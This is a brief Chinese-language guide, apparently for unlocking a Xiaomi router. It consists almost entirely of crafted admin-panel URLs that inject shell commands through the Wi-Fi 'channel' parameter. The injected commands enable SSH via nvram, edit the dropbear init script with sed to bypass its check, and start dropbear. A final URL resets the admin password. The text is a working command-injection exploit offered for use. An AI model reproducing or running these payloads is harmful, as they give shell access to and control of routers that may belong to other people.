
用浏览器登陆小米路由器后台
地址栏一般是这样：

http://192.168.31.1/cgi-bin/luci/;stok=[你的stok]/web/home#router

改成如下并回车：

http://192.168.31.1/cgi-bin/luci/;stok=[你的stok]/api/xqnetwork/set_wifi_ap?ssid=tianbao&encryption=NONE&enctype=NONE&channel=1%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit

继续：

http://192.168.31.1/cgi-bin/luci/;stok=[你的stok]/api/xqnetwork/set_wifi_ap?ssid=tianbao&encryption=NONE&enctype=NONE&channel=1%3Bsed%20%2Di%20%22%3Ax%3AN%3As%2Fif%20%5C%5B%2E%2A%5C%3B%20then%5Cn%2E%2Areturn%200%5Cn%2E%2Afi%2F%23tb%2F%3Bb%20x%22%20%2Fetc%2Finit.d%2Fdropbear

继续:

http://192.168.31.1/cgi-bin/luci/;stok=[你的stok]/api/xqnetwork/set_wifi_ap?ssid=tianbao&encryption=NONE&enctype=NONE&channel=1%3B%2Fetc%2Finit.d%2Fdropbear%20start

继续：

http://192.168.31.1/cgi-bin/luci/;stok=[你的stok]/api/xqsystem/set_name_password?oldPwd=admin123456789&newPwd=daijin123456789